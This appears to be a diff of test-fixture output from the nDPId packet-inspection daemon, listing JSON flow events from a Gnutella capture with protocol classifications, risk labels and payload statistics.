-00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91151,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":1717,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1138,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74328,"flow_last_seen":88171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90842,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":91380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":90863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1090,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90747,"flow_last_seen":91396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3774,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90747,"flow_last_seen":90902,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":670,"flow_tot_l4_payload_len":1773,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":15284,"flow_last_seen":23969,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1601,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":63001,"flow_last_seen":78562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1097,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74327,"flow_last_seen":74692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1108,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72907,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1105,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":22405,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":12827,"flow_last_seen":41755,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":966,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00783{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":16487,"flow_last_seen":192636,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":15284,"flow_last_seen":23969,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1601,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00672{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":21843,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":12461,"flow_last_seen":75501,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":637,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90746,"flow_last_seen":90799,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":22405,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":90746,"flow_last_seen":91392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3761,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91151,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":1717,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1138,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74328,"flow_last_seen":88171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90842,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":91380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":90863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1090,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90747,"flow_last_seen":91396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3774,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90747,"flow_last_seen":90902,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":670,"flow_tot_l4_payload_len":1773,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":15284,"flow_last_seen":23969,"flow_idle_time":200000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1601,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":87671,"flow_last_seen":88801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":87671,"flow_last_seen":88801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":21843,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90739,"flow_last_seen":91076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 